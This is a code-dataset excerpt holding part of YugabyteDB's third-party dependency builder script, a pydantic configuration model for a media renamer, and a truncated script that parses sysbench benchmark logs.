self.log_output(log_prefix, ['cp', src_path, dest_path])\n\n def validate_build_output(self) -> None:\n if is_macos():\n target_arch = get_target_arch()\n disallowed_suffix = ' ' + get_other_macos_arch(target_arch)\n log(\"Verifying achitecture of object files and libraries in %s (should be %s)\",\n os.getcwd(), target_arch)\n object_files = subprocess.check_output(\n ['find', os.getcwd(), '-name', '*.o', '-or', '-name', '*.dylib']\n ).strip().decode('utf-8').split('\\n')\n for object_file_path in object_files:\n file_type = subprocess.check_output(['file', object_file_path]).strip().decode(\n 'utf-8')\n if file_type.endswith(disallowed_suffix):\n raise ValueError(\n \"Incorrect object file architecture generated for %s (%s expected): %s\" % (\n object_file_path, target_arch, file_type))\n\n def check_spurious_a_out_file(self) -> None:\n \"\"\"\"\n Sometimes an a.out file gets generated in the top-level directory. This is an attempt to\n catch it and figure out how it is being generated.\n \"\"\"\n spurious_a_out_path = os.path.join(YB_THIRDPARTY_DIR, 'a.out')\n if os.path.exists(spurious_a_out_path):\n log(f'The spurious a.out file got generated in {YB_THIRDPARTY_DIR}. Deleting it.'\n 'In the future, we will track down where it is coming from.')\n os.remove(spurious_a_out_path)\n\n def build_one_build_type(self, build_type: BuildType) -> None:\n if (build_type != BuildType.COMMON and\n self.args.build_type is not None and\n build_type != self.args.build_type):\n log(\"Skipping build type %s because build type %s is specified in the arguments\",\n build_type, self.args.build_type)\n return\n\n self.set_build_type(build_type)\n build_group = (BuildGroup.COMMON if build_type == BuildType.COMMON\n else BuildGroup.POTENTIALLY_INSTRUMENTED)\n\n dependencies_matching_group = [\n dep for dep in self.selected_dependencies if dep.build_group == build_group\n ]\n for dep in dependencies_matching_group:\n self.perform_pre_build_steps(dep)\n\n for dep in dependencies_matching_group:\n should_build = dep.should_build(self)\n should_rebuild = self.should_rebuild_dependency(dep)\n if should_build and should_rebuild:\n self.build_dependency(dep, only_process_flags=False)\n self.check_spurious_a_out_file()\n else:\n self.build_dependency(dep, only_process_flags=True)\n log(f\"Skipped dependency {dep.name}: \"\n f\"should_build={should_build}, \"\n f\"should_rebuild={should_rebuild}.\")\n\n for dep in self.selected_dependencies:\n if build_group == dep.build_group:\n self.perform_pre_build_steps(dep)\n should_build = dep.should_build(self)\n should_rebuild = self.should_rebuild_dependency(dep)\n if should_build and should_rebuild:\n self.build_dependency(dep, only_process_flags=False)\n self.check_spurious_a_out_file()\n else:\n self.build_dependency(dep, only_process_flags=True)\n log(f\"Skipped dependency {dep.name}: \"\n f\"should_build={should_build}, \"\n f\"should_rebuild={should_rebuild}.\")\n\n def get_install_prefix(self) -> str:\n return os.path.join(self.fs_layout.tp_installed_dir, self.build_type.dir_name())\n\n def set_build_type(self, build_type: BuildType) -> None:\n self.build_type = build_type\n self.prefix = self.get_install_prefix()\n self.prefix_bin = os.path.join(self.prefix, 'bin')\n self.prefix_lib = os.path.join(self.prefix, 'lib')\n self.prefix_include = os.path.join(self.prefix, 'include')\n\n def init_flags(self, dep: Dependency) -> None:\n \"\"\"\n Initializes compiler and linker flags. No flag customizations should be transferred from one\n dependency to another.\n \"\"\"\n self.init_compiler_independent_flags(dep)\n\n if not is_macos() and self.compiler_choice.using_clang():\n # Special setup for Clang on Linux.\n compiler_choice = self.compiler_choice\n llvm_major_version: Optional[int] = compiler_choice.get_llvm_major_version()\n if llvm_major_version is not None and llvm_major_version >= 10:\n self.init_linux_clang_flags(dep)\n else:\n raise ValueError(f\"Unknown or unsupproted LLVM major version: {llvm_major_version}\")\n\n if self.compiler_choice.using_gcc():\n self.cxx_flags.append('-fext-numeric-literals')\n\n def get_libcxx_dirs(self, libcxx_installed_suffix: str) -> Tuple[str, str]:\n libcxx_installed_path = os.path.join(\n self.fs_layout.tp_installed_dir, libcxx_installed_suffix, 'libcxx')\n libcxx_installed_include = os.path.join(libcxx_installed_path, 'include', 'c++', 'v1')\n libcxx_installed_lib = os.path.join(libcxx_installed_path, 'lib')\n return libcxx_installed_include, libcxx_installed_lib\n\n def init_linux_clang_flags(self, dep: Dependency) -> None:\n \"\"\"\n Flags for Clang. We are using LLVM-supplied libunwind, and in most cases, compiler-rt in\n this configuration.\n \"\"\"\n llvm_major_version = self.compiler_choice.get_llvm_major_version()\n assert llvm_major_version is not None\n\n if not using_linuxbrew():\n # We don't build compiler-rt for Linuxbrew yet.\n # TODO: we can build compiler-rt here the same way we build other LLVM components,\n # such as libunwind, libc++abi, and libc++.\n self.ld_flags.append('-rtlib=compiler-rt')\n\n self.ld_flags.append('-fuse-ld=lld')\n if self.lto_type is not None:\n self.compiler_flags.append('-flto=%s' % self.lto_type)\n\n clang_linuxbrew_isystem_flags = []\n\n if using_linuxbrew():\n linuxbrew_dir = get_linuxbrew_dir()\n assert linuxbrew_dir is not None\n self.ld_flags.append(\n '-Wl,--dynamic-linker=%s' % os.path.join(linuxbrew_dir, 'lib', 'ld.so'))\n self.compiler_flags.append('-nostdinc')\n self.compiler_flags.append('--gcc-toolchain={}'.format(linuxbrew_dir))\n\n assert self.compiler_choice.cc is not None\n clang_include_dir = get_clang_include_dir(self.compiler_choice.cc)\n\n clang_linuxbrew_isystem_flags = [\n '-isystem', clang_include_dir,\n\n # This is the include directory of the Linuxbrew GCC 5.5 / glibc 2.23 bundle.\n '-isystem', os.path.join(linuxbrew_dir, 'include')\n ]\n\n if self.build_type == BuildType.COMMON:\n self.preprocessor_flags.extend(clang_linuxbrew_isystem_flags)\n return\n\n # TODO mbautin: refactor to polymorphism\n is_libcxxabi = dep.name.endswith('_libcxxabi')\n is_libcxx = dep.name.endswith('_libcxx')\n\n is_libcxx_with_abi = dep.name.endswith('_libcxx_with_abi')\n\n log(\"Dependency name: %s, is_libcxxabi: %s, is_libcxx: %s\",\n dep.name, is_libcxxabi, is_libcxx)\n\n if self.build_type == BuildType.ASAN:\n if is_libcxxabi or is_libcxx_with_abi:\n # To avoid an infinite loop in UBSAN.\n # https://monorail-prod.appspot.com/p/chromium/issues/detail?id=609786\n # This comment:\n # https://gist.githubusercontent.com/mbautin/ad9ea4715669da3b3a5fb9495659c4a9/raw\n self.compiler_flags.append('-fno-sanitize=vptr')\n\n # Unfortunately, for the combined libc++ and libc++abi build in Clang 13 or later,\n # we also disable this check in libc++, where in theory it could have been\n # enabled.\n\n # The description of this check from\n # https://clang.llvm.org/docs/UndefinedBehaviorSanitizer.html:\n #\n # -fsanitize=vptr: Use of an object whose vptr indicates that it is of the wrong\n # dynamic type, or that its lifetime has not begun or has ended. Incompatible with\n # -fno-rtti. Link must be performed by clang++, not clang, to make sure C++-specific\n # parts of the runtime library and C++ standard libraries are present.\n\n assert self.compiler_choice.cc is not None\n ubsan_lib_candidates = []\n ubsan_lib_found = False\n for ubsan_lib_arch_suffix in ['', f'-{platform.processor()}']:\n ubsan_lib_name = f'clang_rt.ubsan_minimal{ubsan_lib_arch_suffix}'\n ubsan_lib_file_name = f'lib{ubsan_lib_name}.so'\n compiler_rt_lib_dir_as_list = get_clang_library_dir(\n self.compiler_choice.get_c_compiler(),\n look_for_file=ubsan_lib_file_name)\n if not compiler_rt_lib_dir_as_list:\n continue\n assert len(compiler_rt_lib_dir_as_list) == 1\n compiler_rt_lib_dir = compiler_rt_lib_dir_as_list[0]\n self.add_lib_dir_and_rpath(compiler_rt_lib_dir)\n\n ubsan_lib_so_path = os.path.join(compiler_rt_lib_dir, ubsan_lib_file_name)\n ubsan_lib_candidates.append(ubsan_lib_so_path)\n if os.path.exists(ubsan_lib_so_path):\n self.ld_flags.append(f'-l{ubsan_lib_name}')\n ubsan_lib_found = True\n break\n if not ubsan_lib_found:\n raise IOError(\n f\"UBSAN library not found at any of the paths: {ubsan_lib_candidates}\")\n llvm_major_version = self.compiler_choice.get_llvm_major_version()\n assert llvm_major_version is not None\n if (llvm_major_version >= 14 and\n dep.build_group != BuildGroup.COMMON and\n dep.name != 'crcutil'):\n self.compiler_flags += ['-mllvm', '-asan-use-private-alias=1']\n\n if self.build_type == BuildType.TSAN and llvm_major_version >= 13:\n self.executable_only_ld_flags.extend(['-fsanitize=thread'])\n\n self.ld_flags += ['-lunwind']\n\n libcxx_installed_include, libcxx_installed_lib = self.get_libcxx_dirs(\n self.build_type.dir_name())\n log(\"libc++ include directory: %s\", libcxx_installed_include)\n log(\"libc++ library directory: %s\", libcxx_installed_lib)\n\n if not is_libcxx and not is_libcxxabi and not is_libcxx_with_abi:\n log(\"Adding special compiler/linker flags for Clang 10+ for dependencies other than \"\n \"libc++\")\n self.ld_flags += ['-stdlib=libc++', '-lc++', '-lc++abi']\n # TODO(asrivastava): We might not need libc++ in cxxflags but removing it causes certain\n # builds to fail.\n self.cxx_flags += ['-stdlib=libc++', '-nostdinc++']\n self.preprocessor_flags.extend(['-isystem', libcxx_installed_include])\n self.prepend_lib_dir_and_rpath(libcxx_installed_lib)\n\n if is_libcxx:\n log(\"Adding special compiler/linker flags for Clang for libc++\")\n # This is needed for libc++ to find libc++abi headers.\n assert_dir_exists(libcxx_installed_include)\n self.preprocessor_flags.append('-I%s' % libcxx_installed_include)\n # libc++ build needs to be able to find libc++abi library installed here.\n self.ld_flags.append('-L%s' % libcxx_installed_lib)\n\n if is_libcxx or is_libcxxabi or is_libcxx_with_abi:\n log(\"Adding special linker flags for Clang for libc++ or libc++abi\")\n # libc++abi needs to be able to find libcxx at runtime, even though it can't always find\n # it at build time because libc++abi is built first.\n self.add_rpath(libcxx_installed_lib)\n\n self.preprocessor_flags.extend(clang_linuxbrew_isystem_flags)\n\n no_unused_arg = '-Wno-error=unused-command-line-argument'\n self.compiler_flags.append(no_unused_arg)\n self.ld_flags.append(no_unused_arg)\n\n log(\"Flags after the end of setup for Clang:\")\n log(\"compiler_flags : %s\", self.compiler_flags)\n log(\"cxx_flags : %s\", self.cxx_flags)\n log(\"c_flags : %s\", self.c_flags)\n log(\"ld_flags : %s\", self.ld_flags)\n log(\"preprocessor_flags : %s\", self.preprocessor_flags)\n\n def get_effective_compiler_flags(self, dep: Dependency) -> List[str]:\n return self.compiler_flags + dep.get_additional_compiler_flags(self)\n\n def get_effective_cxx_flags(self, dep: Dependency) -> List[str]:\n # The C++ standard must match CMAKE_CXX_STANDARD in the top-level CMakeLists.txt file in\n # the YugabyteDB source tree.\n return (self.cxx_flags +\n self.get_effective_compiler_flags(dep) +\n dep.get_additional_cxx_flags(self) +\n ['-std=c++{}'.format(dep.get_cxx_version(self))])\n\n def get_effective_c_flags(self, dep: Dependency) -> List[str]:\n return (self.c_flags +\n self.get_effective_compiler_flags(dep) +\n dep.get_additional_c_flags(self))\n\n def get_effective_ld_flags(self, dep: Dependency) -> List[str]:\n return (dep.get_additional_leading_ld_flags(self) +\n self.ld_flags +\n dep.get_additional_ld_flags(self))\n\n def get_effective_assembler_flags(self, dep: Dependency) -> List[str]:\n return self.assembler_flags + dep.get_additional_assembler_flags(self)\n\n def get_effective_executable_ld_flags(self, dep: Dependency) -> List[str]:\n return self.ld_flags + self.executable_only_ld_flags + dep.get_additional_ld_flags(self)\n\n def get_effective_preprocessor_flags(self, dep: Dependency) -> List[str]:\n return list(self.preprocessor_flags)\n\n def get_common_cmake_flag_args(self, dep: Dependency) -> List[str]:\n assert not dep.use_cppflags_env_var(), \\\n f'Dependency {dep.name} is being built with CMake but its use_cppflags_env_var ' \\\n 'function returns True. CPPFLAGS only applies to configure-based builds.'\n\n preprocessor_flags = self.get_effective_preprocessor_flags(dep)\n c_flags_str = ' '.join(preprocessor_flags + self.get_effective_c_flags(dep))\n cxx_flags_str = ' '.join(preprocessor_flags + self.get_effective_cxx_flags(dep))\n\n ld_flags_str = ' '.join(self.get_effective_ld_flags(dep))\n exe_ld_flags_str = ' '.join(self.get_effective_executable_ld_flags(dep))\n return [\n '-DCMAKE_C_FLAGS={}'.format(c_flags_str),\n '-DCMAKE_CXX_FLAGS={}'.format(cxx_flags_str),\n '-DCMAKE_SHARED_LINKER_FLAGS={}'.format(ld_flags_str),\n '-DCMAKE_EXE_LINKER_FLAGS={}'.format(exe_ld_flags_str),\n '-DCMAKE_EXPORT_COMPILE_COMMANDS=ON',\n '-DCMAKE_INSTALL_PREFIX={}'.format(dep.get_install_prefix(self)),\n '-DCMAKE_POSITION_INDEPENDENT_CODE=ON'\n ]\n\n def perform_pre_build_steps(self, dep: Dependency) -> None:\n log(\"\")\n colored_log(YELLOW_COLOR, SEPARATOR)\n colored_log(YELLOW_COLOR, \"Building %s (%s)\", dep.name, self.build_type)\n colored_log(YELLOW_COLOR, SEPARATOR)\n\n src_path, src_path_type = self.fs_layout.get_source_path_with_type(dep)\n\n def do_default_download() -> None:\n self.download_manager.download_dependency(\n dep=dep,\n src_path=src_path,\n archive_path=self.fs_layout.get_archive_path(dep))\n\n if src_path_type == file_system_layout.SourcePathType.DEFAULT:\n log(\"Downloading %s\", dep)\n do_default_download()\n elif src_path_type == file_system_layout.SourcePathType.DEV_REPO:\n if os.path.exists(src_path):\n log(\"Using existing source directory (development repo) %s\", src_path)\n elif (dep.github_org_name and\n dep.github_repo_name and\n dep.github_ref and\n len(dep.patches) == 0):\n git_url = 'git@github.com:{}/{}.git'.format(\n dep.github_org_name, dep.github_repo_name)\n git_util.git_clone(git_url, dep.github_ref, src_path,\n depth=constants.GIT_CLONE_DEPTH)\n else:\n log(\"Dependency %s does not have a Git URL and/or has patches (%d patches), doing \"\n \"regular archive download to %s instead a Git clone\",\n dep.name, len(dep.patches), src_path)\n do_default_download()\n else:\n raise ValueError(\"Unhandled source path type: %s for %s. Source path: %s\" % (\n src_path_type, dep.name, src_path))\n\n self.fossa_deps.append({\n \"name\": dep.name,\n \"version\": dep.version,\n \"url\": dep.download_url\n })\n\n def get_clang_toolchain_dir(self) -> Optional[str]:\n if self.toolchain and self.compiler_choice.is_clang():\n return self.toolchain.toolchain_root\n return None\n\n def build_dependency(self, dep: Dependency, only_process_flags: bool = False) -> None:\n \"\"\"\n Build the given dependency.\n\n :param only_process_flags: if this is True, we will only set up the compiler and linker\n flags and apply all the side effects of that process, such as collecting the set of\n allowed library paths referred by the final artifacts. If False, we will actually do\n the build.\n \"\"\"\n\n self.compiler_choice.set_compiler(\n use_compiler_wrapper=self.args.use_compiler_wrapper or dep.need_compiler_wrapper(self))\n if self.args.download_extract_only:\n log(\"Skipping build of dependency %s, build type %s, --download-extract-only is \"\n \"specified.\", dep.name, self.build_type)\n return\n\n self.init_flags(dep)\n\n # This is needed at least for glog to be able to find gflags.\n self.add_rpath(\n os.path.join(self.fs_layout.tp_installed_dir, self.build_type.dir_name(), 'lib'))\n\n if self.build_type != BuildType.COMMON:\n # Needed to find libunwind for Clang 10 when using compiler-rt.\n self.add_rpath(os.path.join(\n self.fs_layout.tp_installed_dir, BuildType.COMMON.dir_name(), 'lib'))\n\n if only_process_flags:\n log(\"Skipping the build of dependecy %s\", dep.name)\n return\n\n env_vars: Dict[str, Optional[str]] = {\n \"CPPFLAGS\": \" \".join(self.preprocessor_flags)\n }\n\n use_cppflags_env_var = dep.use_cppflags_env_var()\n preprocessor_flags = self.get_effective_preprocessor_flags(dep)\n\n cppflags_list: List[str] = []\n if use_cppflags_env_var:\n # Preprocessor flags are specified as CPPFLAGS.\n preprocessor_flags_in_compiler_flags = []\n cppflags_list = preprocessor_flags\n else:\n # Preprocessor flags are specified in CXXFLAGS and CFLAGS directly.\n preprocessor_flags_in_compiler_flags = preprocessor_flags\n cppflags_list = []\n\n log_and_set_env_var_to_list(env_vars, 'CPPFLAGS', cppflags_list)\n\n log_and_set_env_var_to_list(\n env_vars,\n 'CXXFLAGS',\n preprocessor_flags_in_compiler_flags + self.get_effective_cxx_flags(dep))\n log_and_set_env_var_to_list(\n env_vars,\n 'CFLAGS',\n preprocessor_flags_in_compiler_flags + self.get_effective_c_flags(dep))\n log_and_set_env_var_to_list(env_vars, 'LDFLAGS', self.get_effective_ld_flags(dep))\n log_and_set_env_var_to_list(\n env_vars, 'ASFLAGS', self.get_effective_assembler_flags(dep))\n log_and_set_env_var_to_list(env_vars, 'LIBS', self.libs)\n\n compiler_wrapper_extra_ld_flags = dep.get_compiler_wrapper_ld_flags_to_append(self)\n if compiler_wrapper_extra_ld_flags:\n if not self.compiler_choice.use_compiler_wrapper:\n raise RuntimeError(\n \"Need to add extra linker arguments in the compiler wrapper, but compiler \"\n \"wrapper is not being used: %s\" % compiler_wrapper_extra_ld_flags)\n log_and_set_env_var_to_list(\n env_vars, COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_APPEND,\n compiler_wrapper_extra_ld_flags)\n\n compiler_wrapper_ld_flags_to_remove: Set[str] = dep.get_compiler_wrapper_ld_flags_to_remove(\n self)\n if compiler_wrapper_ld_flags_to_remove:\n if not self.compiler_choice.use_compiler_wrapper:\n raise RuntimeError(\n \"Need to remove some linker arguments in the compiler wrapper, but compiler \"\n \"wrapper is not being used: %s\" % sorted(compiler_wrapper_ld_flags_to_remove))\n log_and_set_env_var_to_list(\n env_vars, COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_REMOVE,\n sorted(compiler_wrapper_ld_flags_to_remove))\n\n for k, v in env_vars.items():\n log(\"Setting environment variable %s to: %s\" % (k, v))\n\n if self.build_type == BuildType.ASAN:\n # To avoid errors similar to:\n # https://gist.githubusercontent.com/mbautin/4b8eec566f54bcc35706dcd97cab1a95/raw\n #\n # This could also be fixed to some extent by the compiler flags\n # -mllvm -asan-use-private-alias=1\n # but applying that flag to all builds is complicated in practice and is probably\n # best done using a compiler wrapper script, which would slow things down.\n #\n # Also do not detect memory leaks during the build process. E.g. configure scripts might\n # create some programs that have memory leaks and the configure process would fail.\n env_vars[\"ASAN_OPTIONS\"] = ':'.join([\"detect_odr_violation=0\", \"detect_leaks=0\"])\n\n compile_commands_tmp_dir = None\n\n clang_toolchain_dir = self.get_clang_toolchain_dir()\n\n try:\n if self.args.compile_commands and not self.build_type.is_sanitizer():\n compile_commands_tmp_dir = compile_commands.get_compile_commands_tmp_dir_path(\n dep.name)\n env_vars[compile_commands.TMP_DIR_ENV_VAR_NAME] = compile_commands_tmp_dir\n util.mkdir_p(compile_commands_tmp_dir)\n\n src_dir = self.fs_layout.get_source_path(dep)\n build_dir = self.create_build_dir_and_prepare(dep)\n if self.args.postprocess_compile_commands_only:\n log(\"Only post-processing compile_commands.json in %s, skipping build\", build_dir)\n compile_commands.postprocess_compile_commands(\n build_dir, self.bazel_path_mapping, clang_toolchain_dir, src_dir)\n return\n\n with PushDir(build_dir):\n with EnvVarContext(**env_vars):\n write_env_vars(DEPENDENCY_ENV_FILE_NAME)\n log(\"PATH=%s\" % os.getenv('PATH'))\n dep.build(self)\n if compile_commands_tmp_dir is not None:\n compile_commands.aggregate_compile_commands(\n compile_commands_tmp_dir, build_dir, self.bazel_path_mapping,\n clang_toolchain_dir, src_dir)\n finally:\n if compile_commands_tmp_dir is not None:\n log(\"Deleting %s\", compile_commands_tmp_dir)\n subprocess.check_call(['rm', '-rf', compile_commands_tmp_dir])\n\n self.save_build_stamp_for_dependency(dep)\n log(\"\")\n log(\"Finished building %s (%s)\", dep.name, self.build_type)\n log(\"\")\n\n # Determines if we should rebuild a component with the given name based on the existing \"stamp\"\n # file and the current value of the \"stamp\" (based on Git SHA1 and local changes) for the\n # component. The result is returned in should_rebuild_component_rv variable, which should have\n # been made local by the caller.\n def should_rebuild_dependency(self, dep: Dependency) -> bool:\n dep_name_and_build_type_str = \"%s (%s)\" % (dep.name, self.build_type)\n if self.args.ignore_build_stamps:\n log(\"Ignoring build stamps (--ignore-build-stamps specified), will rebuild: %s\",\n dep_name_and_build_type_str)\n return True\n\n stamp_path = self.fs_layout.get_build_stamp_path_for_dependency(dep, self.build_type)\n old_build_stamp = None\n if os.path.exists(stamp_path):\n with open(stamp_path, 'rt') as inp:\n old_build_stamp = inp.read()\n\n new_build_stamp = self.get_build_stamp_for_dependency(dep)\n\n if dep.dir_name is not None:\n src_dir = self.fs_layout.get_source_path(dep)\n if not os.path.exists(src_dir):\n log(\"Have to rebuild %s: source dir %s does not exist\",\n dep_name_and_build_type_str, src_dir)\n return True\n\n build_dir = self.fs_layout.get_build_dir_for_dependency(dep, self.build_type)\n if not os.path.exists(build_dir):\n log(\"Have to rebuild %s: build dir %s does not exist\",\n dep_name_and_build_type_str, build_dir)\n return True\n\n if old_build_stamp == new_build_stamp:\n if self.args.force:\n log(\"No changes detected for %s, rebuilding anyway (--force specified).\",\n dep_name_and_build_type_str)\n else:\n log(\"Not rebuilding %s -- nothing changed.\", dep_name_and_build_type_str)\n return False\n\n log(\"Have to rebuild %s (%s):\", dep.name, self.build_type)\n log(\"Old build stamp for %s (from %s):\\n%s\",\n dep.name, stamp_path, indent_lines(old_build_stamp))\n log(\"New build stamp for %s:\\n%s\",\n dep.name, indent_lines(new_build_stamp))\n return True\n\n # Come up with a string that allows us to tell when to rebuild a particular third-party\n # dependency. The result is returned in the get_build_stamp_for_component_rv variable, which\n # should have been made local by the caller.\n def get_build_stamp_for_dependency(self, dep: Dependency) -> str:\n module_name = dep.__class__.__module__\n assert isinstance(module_name, str), \"Dependency's module is not a string: %s\" % module_name\n assert module_name.startswith('build_definitions.'), \"Invalid module name: %s\" % module_name\n module_name_components = module_name.split('.')\n assert len(module_name_components) == 2, (\n \"Expected two components: %s\" % module_name_components)\n module_name_final = module_name_components[-1]\n input_files_for_stamp = [\n 'python/yugabyte_db_thirdparty/yb_build_thirdparty_main.py',\n 'build_thirdparty.sh',\n os.path.join('python', 'build_definitions', '%s.py' % module_name_final)\n ]\n\n for path in input_files_for_stamp:\n abs_path = os.path.join(YB_THIRDPARTY_DIR, path)\n if not os.path.exists(abs_path):\n fatal(\"File '%s' does not exist -- expecting it to exist when creating a 'stamp' \"\n \"for the build configuration of '%s'.\", abs_path, dep.name)\n\n with PushDir(YB_THIRDPARTY_DIR):\n git_commit_sha1 = subprocess.check_output(\n ['git', 'log', '--pretty=%H', '-n', '1'] + input_files_for_stamp\n ).strip().decode('utf-8')\n build_stamp = 'git_commit_sha1={}\\n'.format(git_commit_sha1)\n for git_extra_arg in (None, '--cached'):\n git_extra_args = [git_extra_arg] if git_extra_arg else []\n git_diff = subprocess.check_output(\n ['git', 'diff'] + git_extra_args + input_files_for_stamp)\n git_diff_sha256 = hashlib.sha256(git_diff).hexdigest()\n build_stamp += 'git_diff_sha256{}={}\\n'.format(\n '_'.join(git_extra_args).replace('--', '_'),\n git_diff_sha256)\n return build_stamp\n\n def save_build_stamp_for_dependency(self, dep: Dependency) -> None:\n stamp = self.get_build_stamp_for_dependency(dep)\n stamp_path = self.fs_layout.get_build_stamp_path_for_dependency(dep, self.build_type)\n\n log(\"Saving new build stamp to '%s':\\n%s\", stamp_path, indent_lines(stamp))\n with open(stamp_path, \"wt\") as out:\n out.write(stamp)\n\n def create_build_dir_and_prepare(self, dep: Dependency) -> str:\n src_dir = self.fs_layout.get_source_path(dep)\n if not os.path.isdir(src_dir):\n fatal(\"Directory '{}' does not exist\".format(src_dir))\n\n build_dir = self.fs_layout.get_build_dir_for_dependency(dep, self.build_type)\n\n if self.args.delete_build_dir:\n log(\"Deleting directory %s (--delete-build-dir specified)\", build_dir)\n subprocess.check_call(['rm', '-rf', build_dir])\n util.mkdir_p(build_dir)\n\n # Write the source path to a file in the build directory. We use this during processing of\n # compilation database files to map file paths in the build directory back to the source\n # directory.\n util.write_file(os.path.join(build_dir, constants.SRC_PATH_FILE_NAME), src_dir + '\\n')\n\n if dep.copy_sources:\n if dep.shared_and_static:\n target_dirs = [\n os.path.join(build_dir, subdir_name)\n for subdir_name in ['shared', 'static']\n ]\n else:\n target_dirs = [build_dir]\n\n for target_dir in target_dirs:\n log(\"Bootstrapping %s from %s using rsync\", target_dir, src_dir)\n bootstrap_start_sec = time.time()\n subprocess.check_call(['rsync', '-a', src_dir + '/', target_dir])\n bootstrap_elapsed_sec = time.time() - bootstrap_start_sec\n log(\"Bootstrapping %s took %.3f sec\", target_dir, bootstrap_elapsed_sec)\n\n return build_dir\n\n def is_release_build(self) -> bool:\n \"\"\"\n Distinguishes between build types that are potentially used in production releases from\n build types that are only used in testing (e.g. ASAN+UBSAN, TSAN).\n \"\"\"\n return self.build_type in [BuildType.COMMON, BuildType.UNINSTRUMENTED]\n\n def cmake_build_type_for_test_only_dependencies(self) -> str:\n return 'Release' if self.is_release_build() else 'Debug'\n\n def check_cxx_compiler_flag(self, flag: str) -> bool:\n compiler_path = self.compiler_choice.get_cxx_compiler()\n log(f\"Checking if the compiler {compiler_path} accepts the flag {flag}\")\n process = subprocess.Popen(\n [compiler_path, '-x', 'c++', flag, '-'],\n stdin=subprocess.PIPE)\n assert process.stdin is not None\n process.stdin.write(\"int main() { return 0; }\".encode('utf-8'))\n process.stdin.close()\n return process.wait() == 0\n\n def add_checked_flag(self, flags: List[str], flag: str) -> None:\n if self.check_cxx_compiler_flag(flag):\n flags.append(flag)\n\n def get_openssl_dir(self) -> str:\n return os.path.join(self.fs_layout.tp_installed_common_dir)\n\n def get_openssl_related_cmake_args(self) -> List[str]:\n \"\"\"\n Returns a list of CMake arguments to use to pick up the version of OpenSSL that we should be\n using. Returns an empty list if the default OpenSSL installation should be used.\n \"\"\"\n openssl_dir = self.get_openssl_dir()\n openssl_options = ['-DOPENSSL_ROOT_DIR=' + openssl_dir]\n openssl_crypto_library = os.path.join(\n openssl_dir, 'lib', 'libcrypto.' + self.shared_lib_suffix)\n openssl_ssl_library = os.path.join(openssl_dir, 'lib', 'libssl.' + self.shared_lib_suffix)\n openssl_options += [\n '-DOPENSSL_CRYPTO_LIBRARY=' + openssl_crypto_library,\n '-DOPENSSL_SSL_LIBRARY=' + openssl_ssl_library,\n '-DOPENSSL_LIBRARIES=%s;%s' % (openssl_crypto_library, openssl_ssl_library)\n ]\n return openssl_options\n","repo_name":"yugabyte/yugabyte-db-thirdparty","sub_path":"python/yugabyte_db_thirdparty/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":68219,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"20975416266","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Extra\n\nfrom models.scene import PerformerGenderEnum\n\n\nclass TemplateVariablesConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n PERFORMERS_CONFIG: Optional[PerformersConfig] = None\n SCENE_TITLE_CONFIG: Optional[SceneTitleConfig] = None\n\n\n# The type of the ORDER_BY keys in the PerformersConfig\nclass PerformerOrderByKeys(str, Enum):\n ID = \"id\"\n NAME = \"name\"\n\n\nclass PerformersConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n # The separator to use between performers in the performers list. ie if SEPARATOR is \", \" then the list will be \"performer1, performer2, performer3\"\n SEPARATOR: str = \", \"\n # The max number of performers to include in the performers list. ie if LIMIT is 3 and there are 5 performers, then only the first 3 performers will be included in the list\n LIMIT: Optional[int] = None\n # a list of genders to exclude from the performers list\n EXCLUDE_GENDERS: Optional[list[PerformerGenderEnum]] = None\n # Can be \"id\" or \"name\"\n ORDER_BY: Optional[PerformerOrderByKeys] = PerformerOrderByKeys.ID\n # Default {performers} value if there are no performers\n # NOTE: This is only used if there are strictly no performers in the scene. If the performers are filtered out using LIMIT or EXCLUDE_GENDERS, then the {performers} value will be empty.\n NO_PERFORMER_NAME: Optional[str] = \"No Performers\"\n\n\nclass SceneTitleConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n REPLACE: Optional[dict[str, str]] = None\n REPLACE_FROM_BEGINNING: Optional[dict[str, str]] = None\n\n\nSceneTitleConfig.update_forward_refs()\nPerformersConfig.update_forward_refs()\nTemplateVariablesConfig.update_forward_refs()\n","repo_name":"sugoi-ahegao/renamer-2","sub_path":"src/models/template_variables_config.py","file_name":"template_variables_config.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32002374453","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport sys\nimport os\nimport re\nimport math\nimport numpy as np\nimport pandas as p\n\nregexHeader = re.compile('microbenchmark of ([\\w\\d/]+)')\nARR_SWAP_TYPE=[\"public\",\"private\"]\nARR_IO_TYPE=[\"oltp_read_only\", \"oltp_write_only\"]\nARR_NUM_THREAD=[64, 128]\nARR_MEM_RATIO=[10, 20, 30]\n\ndef main():\n\tregexAvg = re.compile('avg:\\s*(\\d+\\.\\d+)') # ms unit\n\tfor IO_TYPE in ARR_IO_TYPE:\t\n\t\tfor NUM_THREAD in ARR_NUM_THREAD:\n\t\t\tfor MEM_RATIO in ARR_MEM_RATIO:\n\t\t\t\tarr = []\n\t\t\t\tfor CONT_ID in range(1, NUM_THREAD + 1): \n\t\t\t\t\tLOG_PATH = \"/mnt/data/motiv-old/cont-mysql/\"+ \\\n\t\t\t\t\t\t\t\tIO_TYPE+\"-\"+str(NUM_THREAD)+\"-ratio\"+str(MEM_RATIO)+\"/sysbench\"+str(CONT_ID)+\".output\"\n\n\t\t\t\t\twith open(LOG_PATH) as f:\n\t\t\t\t\t\tf.seek(0)\n\t\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t\tmatch = regexAvg.search(line)\n\t\t\t\t\t\t\tif match:\t\n\t\t\t\t\t\t\t\tarr.append(float(match.group(1)))\n\n\t\t\t\tprint(IO_TYPE+\"-\"+str(NUM_THREAD)+\"-\"+str(MEM_RATIO),end=\"\\n\")\n#\t\t\t\tprint(\"motiv \"+str(np.mean(arr))+\" \"+str(np.std(arr)))\n\t\t\t\tfor i in range(NUM_THREAD):\n\t\t\t\t\tprint(arr[i],end=\" \")\n\n# Begin of program\nif __name__ == 